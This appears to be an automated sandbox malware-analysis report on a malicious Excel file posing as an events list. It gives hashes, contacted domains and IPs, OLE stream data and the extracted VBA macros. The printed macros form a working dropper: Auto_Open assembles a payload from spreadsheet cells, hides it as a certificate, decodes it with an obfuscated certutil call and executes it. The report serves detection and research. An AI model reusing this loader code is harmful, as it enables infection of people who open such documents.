SHA-512:	254AEB271E021CF7D4E729D32531F4A8ED3FFEE66E64127EEBD31A4901276AA2B48917F3DCE7166E41AEDC2C19D7D96AA05953C83FC58C853782C3D1A3205AD1
Malicious:	false
Joe Sandbox View:	Filename: foo.exe, Detection: malicious, Browse

C:\Users\user\AppData\Roaming\Microsoft\Excel\Upcoming%20Events%20February%202018306506831079385728\Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls
File Type:	0
Size (bytes):	275968
Entropy (8bit):	5.93616018417226
Encrypted:	false
MD5:	E27F3D3985BFD4C1BEB2A6DAD7BDBEEE
SHA1:	FE0E285470FA375734F4D7AD7DB46E4B956E8D82
SHA-256:	56A0C1B933B79CBD29788CC2186374B6CA9F7B8785FA07F0A717A7920ED557C9
SHA-512:	C91E7C9191E2099BA35B638D64D7EC15ECC03446EB5F482E68F33E187BDF3B4D36485E1E9C395A19B47C96BB1F6A7DEAEADFAFB74B5EA96C81039B061FC16889
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Excel\Upcoming%20Events%20February%202018306506831079385728\Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls
File Type:	0
Size (bytes):	275968
Entropy (8bit):	5.936303778838868
Encrypted:	false
MD5:	7E490F1C205350D9041E1159CC515E70
SHA1:	1DE192BA50A1BF36AADB2BE94B131D0EDEFBD8CA
SHA-256:	749B4C073E887FAA76077D8448EAC9FE0C3E049F40BA9FD66C4055354D96E8E4
SHA-512:	3CD10944FF45221C23700BA41C72F7A303492CFEF382D36CBEC278E5C24980685365FA4BA1F38BC8CF5846AFE6CF0C326FC8D0FCF7C361775E8755330CD12BB9
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Excel\Upcoming%20Events%20February%202018306506831079385728\Upcoming%20Events%20February%202018.xls.lnk
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Sun Sep 24 13:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Thu Mar 1 08:56:49 2018, length=240128, window=hide
Size (bytes):	658
Entropy (8bit):	4.683329858775622
Encrypted:	false
MD5:	FEBC17950FC8ABFE635FEE117DFBAE9B
SHA1:	B72AD202663239A015692E5AAC73D30B08591055
SHA-256:	D88A7C5D0FB3495D4E3FBF1CFC902627D104234316986E4A4C79FF0114B33275
SHA-512:	C244FAD43042C9DC69C19129B87106F61884E2F404C736B69F81D0034B724EB0F54DB52467C5F3114086E63DC0DD583302A518CC8A6D3F8F4409B1016F1A482C
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Upcoming Events February 2018.LNK
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Thu Mar 1 08:56:49 2018, length=240128, window=hide
Size (bytes):	2280
Entropy (8bit):	4.5898278033091575
Encrypted:	false
MD5:	0A1E2CAFA403EC432707DF932DBEC500
SHA1:	9B9BCBFE35AE4787AEBF4E857FEA2E090D14D681
SHA-256:	D1D34E17169055A5E44E48504FAC1E4F8157C3C8ABBA89ECDBEA9FA23D772ACF
SHA-512:	B20B7CC487AE2D611833ADD05559E9C4129B7F1362B9FF56A5DF8BCB6EA20A718A44034352E4C7F578F7824651D8F0D2071F08B1DA3600FA5F322082A64B135D
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	125
Entropy (8bit):	5.0237062126352185
Encrypted:	false
MD5:	73DC21A435D75A29AD6FE8B9C2B5D54F
SHA1:	B7F58D02606F7B92EE704229B7993250CC0296A1
SHA-256:	646CE20D98F1CA689658E43AC327BF75073282A52E2B00BA82D97918B4A74364
SHA-512:	16C97CBA8B368B53679D6733EB3A72EB46DFE4D553FDC33207A67220C98075857750B46AFD0BEE66A28354941AD3D837EFB9951FC783A177A2EB9F11151A05F0
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\53UY17VY.txt
File Type:	ASCII text
Size (bytes):	275
Entropy (8bit):	5.48177218330869
Encrypted:	false
MD5:	D7CE5532E746E9BCD2CE683CC9F7F45A
SHA1:	D2AAED697A0155AB306E2109043A82F3E61EEF58
SHA-256:	37F6263A5D7C7684317F57A8C76517686BEE602BA500E15F007093150D2A7B73
SHA-512:	0134FF8713B22611BCF9DC4845EE666D6A611D9E41FA6EF6D1DD0AB3A3BECC660CA5E29B57D652E302410F040008B1E8FC3A1FA694ED80F816F70BCE54418BE0
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\8EL5J2KV.txt
File Type:	ASCII text
Size (bytes):	89
Entropy (8bit):	4.264125705834051
Encrypted:	false
MD5:	D6B25DBEC8D6A47A6CDDE5B516CF92CC
SHA1:	CC41863CE38510D077A1D9794732FFBE0184C5A2
SHA-256:	8F85ED0645DFF5137D68B8C745410053785945661963131CFEF8AEEFB2DBE983
SHA-512:	B2C22CAD1A19553A4FE29EAC2DB47395D28308398057D08B7D111376295A8139127E454927F4660366E180DCA4D14D814E122A0D7A6D915C15E9FA69181A9924
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\GEWBLAQE.txt
File Type:	ASCII text
Size (bytes):	276
Entropy (8bit):	5.485541043490594
Encrypted:	false
MD5:	CB10C0929AE801365F22E9340C6DDDDF
SHA1:	9C80C92DCEDAB480131D7F04FBD3B84B52B35358
SHA-256:	5B9D738D142CD55C56BB7B4D418A53E690009919D66DA5F68404600D3B973023
SHA-512:	51DD792DCB0415C561DA642FA4FB283FAD953C30FC33BB3B9076A2412FCE5D50BF35F2E559DD166B3E38C1894AFC309227D6B13BDDA5140F5A2EA4FA2E9D4EFD
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0UXXXB5.txt
File Type:	ASCII text
Size (bytes):	79
Entropy (8bit):	4.203992168884206
Encrypted:	false
MD5:	B8DAD729B652681BBDEB1C4994DE68C3
SHA1:	2F78997F78E84CCE3FE983D4F7E422B58520EC95
SHA-256:	2E58F74B6FF3F7FC87678B0D7EBAD03904969AE3C0E2B037ABF855AAEC92CD5C
SHA-512:	4583A01483AC3D4AA14BDC1E21324ED3B78D5797BFFB2DCA94183278F4DBF715E7291B3FD24E91A79D2446D9AFAAA4E52BF8C7DD440BFF91CD99094B6B239815
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\RDE7VQ72.txt
File Type:	ASCII text
Size (bytes):	276
Entropy (8bit):	5.517677681513101
Encrypted:	false
MD5:	81B004097336DBEBE927B3EABF85D691
SHA1:	A4A12A827B5D351093AFEEFA9C254E35E4062431
SHA-256:	93A1F7E400ED427705AC1263F1CFF5FAD7F2606967BF105CCE95A7CBC04AAFC1
SHA-512:	ED090B9E8BFE711FA658A07DC8B0E3CA5FC046D5022872D1B83748B48DFCA932C296F6B661F641618D6A0C5A1D423201FB1F8392539D31D5B0AE614617C9531C
Malicious:	false

C:\Windows\System32\PerfStringBackup.INI
File Type:	data
Size (bytes):	798048
Entropy (8bit):	3.419088021719328
Encrypted:	false
MD5:	0F606BD0250156E56482C783E97EE11D
SHA1:	11ACC7370C7C426412E4C90732A2EB83AAACC678
SHA-256:	CA85C00A1E2E16F928C822D6B6F74FD7396E68A62DF9E568437E0860451BF7D9
SHA-512:	2079063D329A7AE436081E9D1D0ED64D2F52F5D6B23DE5F3BEB94F2F4873FE67676CC6578CF74C861CF81B0895CE891A1BE7DC2143138D60B51A24C5CB002160
Malicious:	false

C:\Windows\System32\PerfStringBackup.TMP
File Type:	data
Size (bytes):	798048
Entropy (8bit):	3.419088021719328
Encrypted:	false
MD5:	0F606BD0250156E56482C783E97EE11D
SHA1:	11ACC7370C7C426412E4C90732A2EB83AAACC678
SHA-256:	CA85C00A1E2E16F928C822D6B6F74FD7396E68A62DF9E568437E0860451BF7D9
SHA-512:	2079063D329A7AE436081E9D1D0ED64D2F52F5D6B23DE5F3BEB94F2F4873FE67676CC6578CF74C861CF81B0895CE891A1BE7DC2143138D60B51A24C5CB002160
Malicious:	false

C:\Windows\System32\perfc009.dat
File Type:	data
Size (bytes):	122368
Entropy (8bit):	3.394717694858637
Encrypted:	false
MD5:	D056C85A1C65B41A9CF42E7881C6F8FB
SHA1:	FAC63A08ACC9DA04B1658DACB709EB6FF7A64974
SHA-256:	63F3BA0BFB38EFED4C8B0291405D268D1B52EBD25E4318475539F43849FF24DD
SHA-512:	99EB9A3CC8F3DF92C3F5F75B7C4145C74899F1D030DB674CDBE8C2830495A680D406B02C0F48BBC19E65310BA8DAACB40881D358B5EBB17D4035CA91E8B9CFC9
Malicious:	false

C:\Windows\System32\perfh009.dat
File Type:	data
Size (bytes):	664560
Entropy (8bit):	3.264923235841409
Encrypted:	false
MD5:	ADCB5552E236244C593641C5E231FC32
SHA1:	96A8742DD548F5D74DCBC10DFEC21E44A85EB594
SHA-256:	75E794CAF516330F354D1A7862A43D1D535C81730C47B3CA642340695927349D
SHA-512:	325DA9E20A1C337271FF5A6401173FF2406D439343DB3BF4EAD3BF8D29CACD172FBD53EB07D37E3C985DD41D0C49253EA1FF0D6E74E1682FF12EB6C188F120B6
Malicious:	false

C:\Windows\inf\Outlook\0009\outlperf.ini
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	2695
Entropy (8bit):	5.33674634085226
Encrypted:	false
MD5:	509A7197AE66401D1DA76F4BAC1DD0A8
SHA1:	A30F0CF0161ADDBDD3B04B482FEF651EE4EAE322
SHA-256:	EE9E288C3495FD548FD49095BE08807F215FC0780064E179011098C0C7461A34
SHA-512:	4041C1073CB15ADA49D284CF612A95502CE74AC1EF69FD1B9DFDF84EDDD074150B6092C8534E49807AD3166F97127477E3497368AE845D369EBBFC2ACFC6C071
Malicious:	false

C:\Windows\inf\Outlook\outlperf.h
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	551
Entropy (8bit):	4.697154350883649
Encrypted:	false
MD5:	BC71FF7DA14ECA943FA0AD815F72B8CB
SHA1:	CECCD0CFF2DD12AEDE7DE14457D15D00687165BB
SHA-256:	48E537902C03A3EEE4790FC97EE072CDDC7C1A90122702DD18243D8C12A0D99A
SHA-512:	08CD022D34C1B9B080322C3CFA15CC22E3353D42BA55C729723378DC177E8A0E979C6644BC2F97B2E36CB5E864FA37FF05DA6DBA5794A39380E72182015AB324
Malicious:	false

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
ipv4.google.com	172.217.3.174	true	false	0%, virustotal, Browse
www.janes.com	170.207.225.82	true	true	0%, virustotal, Browse
google.com	172.217.3.174	true	false	0%, virustotal, Browse
clients1.google.com	172.217.3.174	true	false	0%, virustotal, Browse
bit.ly	67.199.248.11	true	false
www.singaporeairshow.com	45.118.134.126	true	false
www.google.com	172.217.3.164	true	false
www.globalsofsymposium.org	45.33.77.71	true	true
pki.google.com	172.217.3.174	true	false
www.maritime-recon.com	109.108.140.110	true	false
cdnverify.net	unknown	unknown	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
45.33.77.71	United States	63949	LINODE-APLinodeLLCUS	true
170.207.225.82	United States	17389	IHS-GROUP-InformationHandlingServicesUS	true
8.8.8.8	United States	15169	GOOGLE-GoogleIncUS	false
172.217.3.164	United States	15169	GOOGLE-GoogleIncUS	false
172.217.3.174	United States	15169	GOOGLE-GoogleIncUS	false
67.199.248.11	United States	395224	BITLY-AS-BitlyIncUS	false

Static File Info

General
File type:	0
Entropy (8bit):	5.919124759345106
TrID:	Microsoft Excel sheet (30009/1) 42.85% Microsoft Excel sheet (alternate) (24509/1) 35.00% Generic OLE2 / Multistream Compound File (8008/1) 11.44% Visual Basic Script (6000/0) 8.57% Java Script embedded in Visual Basic Script (1500/0) 2.14%
File name:	Upcoming Events February 2018.xls
File size:	238592
MD5:	56f98e3ed00e48ff9cb89dea5f6e11c1
SHA1:	b06930c9809ab5e4cb6659089ac6fcec470c9c16
SHA256:	cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
SHA512:	13ea1faec447f08688ca408e75d2b4d16e2879b1e86e1ceb3057ecfbd8c9737b553bfa80186b41031f9d6bf599d68628628ebc452f09b7c4b221dc6c08ccedc1
File Content Preview:	........................>.......................................................b.......d......................................................................................................................................................................

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Upcoming Events February 2018.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:	Jones
Last Saved By:	Jones
Create Time:	2018-01-31 13:37:40
Last Saved Time:	2018-02-01 08:23:34
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:	n/a
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: LinesOfBusiness.bas, Stream Size: 4661

General
Stream Path:	_VBA_PROJECT_CUR/VBA/LinesOfBusiness
VBA File Name:	LinesOfBusiness.bas
Stream Size:	4661
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . ( . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . .
Data Raw:	01 16 03 00 03 18 01 00 00 b2 05 00 00 fc 00 00 00 d8 01 00 00 ff ff ff ff e0 05 00 00 a4 0e 00 00 00 00 00 00 01 00 00 00 c8 d7 67 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 40 02 20 00 00 00 ff ff 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
#Else
True)
"-----E"
"stemOb"
Public
Shell
Long)
Long,
expath
CreateObject("Scr"
"TIFICATE-----"
PtrSafe
Declare
String)
rndname
scr.CreateTextFile(path,
GetRand
".txt"
String
"ject")
cutil(code
Randomize
GetRand()
LongPtr)
"ICATE-----"
vbNewLine
(ByVal
"TIFI"
cutil
"C:\Programdata\"
Integer
".exe"
"stemObject")
"LinesOfBusiness"
Cells(i,
file.Write
expath)
Attribute
VB_Name
Function
"CATE-----"
"-----BEG"
dwMilliseconds
(expath)
GetVal
"ipting.FileSy"
GetVal(sr
file.Close
CERTIF"
Sleep

VBA Code

Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = "C:\Programdata\" & rndname & ".txt"
    expath = "C:\Programdata\" & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = "C:\Programdata\" & GetRand & ".txt"
    expath = "C:\Programdata\" & GetRand & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) &     Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub TQuH8wDO()
    Dim p As String
    p = GetVal(2227, 2248, 170)
    cutil (p)
End Sub

VBA File Name: Module1.bas, Stream Size: 1048

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	1048
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 f0 00 00 00 82 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 02 00 00 71 03 00 00 00 00 00 00 01 00 00 00 c8 d7 6f f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
Auto_Open()
VB_Name
vbBlack

VBA Code
`Attribute VB_Name = "Module1" Sub Auto_Open() ActiveSheet.Range("a1:c54").Font.Color = vbBlack Call LinesOfBusiness.TQuH8wDO End Sub`

VBA File Name: Sheet1.cls, Stream Size: 991

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 c8 d7 ca 12 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 c8 d7 c1 2b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	107
Entropy:	4.18482950044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 3460

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	3460
Entropy:	2.98669684624
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . D . . . . . . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n / a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 08 01 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	208
Entropy:	3.4450911397
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J o n e s . . . . . . . . . . . J o n e s . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . G 8 . 5 . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 212412

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	212412
Entropy:	5.9384084692
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . J o n e s B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p W 0 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c9 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 4a 6f 6e 65 73 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 594

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	594
Entropy:	5.28834390026
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = L i n e s O f B u s i n e s s . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B C B A C 0 B A C 0 B E C 4 B E
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 134

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	134
Entropy:	3.46375887688
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . L i n e s O f B u s i n e s s . L . i . n . e . s . O . f . B . u . s . i . n . e . s . s . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4c 69 6e 65 73 4f 66 42 75 73 69 6e 65 73 73 00 4c 00 69 00 6e 00 65 00 73 00 4f 00 66 00 42 00 75 00 73 00 69 00 6e 00 65 00 73 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3078

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3078
Entropy:	4.3999981908
Base64 Encoded:	False
